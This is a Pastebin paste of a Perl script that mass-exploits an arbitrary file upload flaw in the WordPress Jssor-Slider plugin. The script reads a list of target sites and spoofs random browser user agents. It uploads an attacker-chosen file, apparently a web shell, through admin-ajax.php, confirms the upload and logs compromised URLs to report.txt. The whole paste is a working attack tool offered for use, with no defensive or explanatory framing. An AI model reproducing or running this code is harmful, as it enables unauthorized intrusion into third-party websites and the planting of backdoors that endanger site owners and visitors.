Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use LWP::UserAgent;
- my $datestring = localtime();
- ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
- sub randomagent {
- my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
- 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
- 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
- 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
- );
- my $random = $array[rand @array];
- return($random);
- }
- flag();
- print "[+] Input List Target : ";
- chomp (my $list=<>);
- print "[+] Input File : ";
- chomp (my $file=<>);
- print "[+] Started : $datestring\n";
- open(my $arq,'<'.$list) || die($!);
- my @site = <$arq>;
- @site = grep { !/^$/ } @site;
- close($arq);
- print "[".($#site+1)."] URL to test upload\n\n";
- my $i;
- foreach my $web(@site){$i++;
- chomp($web);
- if($web !~ /^(http|https):\/\//){
- $web = 'http://'.$web;
- }
- print "[$i] $web \n";
- print "Check Shell: $web/wp-content/jssor-slider/jssor-uploads/".$file."\n";
- expqq($web);#exploiting website :)
- }
- sub expqq{
- my $useragent = randomagent();#Get a Random User Agent
- my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });#Https websites accept
- $ua->timeout(10);
- $ua->agent($useragent);
- print "[Testing] Test Vuln \n";
- my $url = $_[0]."/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library";
- my $ss = $_[0]."/wp-content/jssor-slider/jssor-uploads/".$file;
- my $response = $ua->get($url);
- if ($response->is_success || $response->content=~/error/){
- print "[OK] Vuln\n";
- print "[*] Sent payload\n";
- my $regex = 'success';
- my $body = $ua->post( $url,
- Content_Type => 'form-data',
- Content => [ 'file' => ["$file"] ]
- );
- if ($body->is_success || $body->content=~ /$regex/){
- print "[+] Payload Berhasil executed\n";
- print "[*] Check jika shell sudah terupload\n\n";
- my $res = $ua->get($ss);
- if ($res->is_success){
- print "[OK] Shell Sukses diupload \n";
- my $ee = $ua->get($_[0]."/wp-content/jssor-slider/jssor-uploads/$file");
- print "\n[*] Website Info :\n";
- print "| ".$_[0]."/wp-content/jssor-slider/jssor-uploads/$file\n\n";
- open(my $fh, '>>', 'report.txt');
- print $fh $_[0]."/wp-content/jssor-slider/jssor-uploads/$file\n";
- close $fh;
- print "[*] Berhasil disimpan report.txt\n\n";
- }
- else {print "[No] Gagal Upload Shell \n\n";}
- }
- else {print "[No] Gagal Kirim Payload\n\n";}
- }
- else {print "[No] Gak Vuln\n\n";}
- }
- sub flag {print "\n[+] WordPress Jssor-Slider Library Plugin Arbitrary Exploiter \n[*] Coder => M-A | Recoded => Dx_Cyber\n(c) Janissaries.org, Sec4ever.com, Lokerilmu-it.blogspot.com\n\n";
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement